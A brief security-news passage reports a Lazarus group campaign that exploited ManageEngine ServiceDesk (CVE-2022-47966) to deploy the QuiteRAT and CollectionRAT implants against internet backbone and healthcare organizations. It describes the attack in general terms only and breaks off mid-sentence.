FISA

  The North Korean state-sponsored Lazarus APT group has initiated a fresh initiative aimed at internet backbone infrastructure and healthcare organizations situated in Europe and the U.S. Cisco Talos reported that the hackers commenced their attack by taking advantage of a vulnerability within ManageEngine ServiceDesk (CVE-2022-47966) as early as January, a mere five days after its disclosure. Diving into details The exploit was employed by Lazarus to establish initial access, prompting the immediate downloading and running of a malicious binary through the Java runtime process, thereby initiating the implant on the compromised server.  This binary represents a modified version of the group’s MagicRAT malware, dubbed  QuiteRAT . The Lazarus Group APT has also introduced a fresh malware named CollectionRAT in this campaign. It functions as a RAT capable of executing arbitrary commands on a compromised system.  Furthermore, security researchers could establish a conne...